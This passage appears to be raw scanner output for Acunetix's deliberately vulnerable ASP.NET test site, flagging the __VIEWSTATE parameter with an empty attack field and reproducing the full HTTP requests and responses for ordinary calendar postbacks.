title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1187 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,187 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8288&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAjGe%2FktoIZGRktud27ob6n4gdF4a780JbldUtGEA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLYvLrBDwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgApMzzHd7rR5%2FrV%2F%2F7XkJxW1yERZF
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:14:47 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAjGe/ktoIZGRktud27ob6n4gdF4a780JbldUtGEA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLYvLrBDwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgApMzzHd7rR5/rV//7XkJxW1yERZF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:White" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1191 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,191 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8276&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAl2pRidoIZGRkN%2Bcv%2F%2BqfiEyR8nWFHu3%2Fgey5Opo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLfsNiBBALtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAgcS8yw9W3%2B%2BI542MdLtXQTS3iCN
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:45:10 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAl2pRidoIZGRkN+cv/+qfiEyR8nWFHu3/gey5Opo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLfsNiBBALtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAgcS8yw9W3++I542MdLtXQTS3iCN" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:White" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" 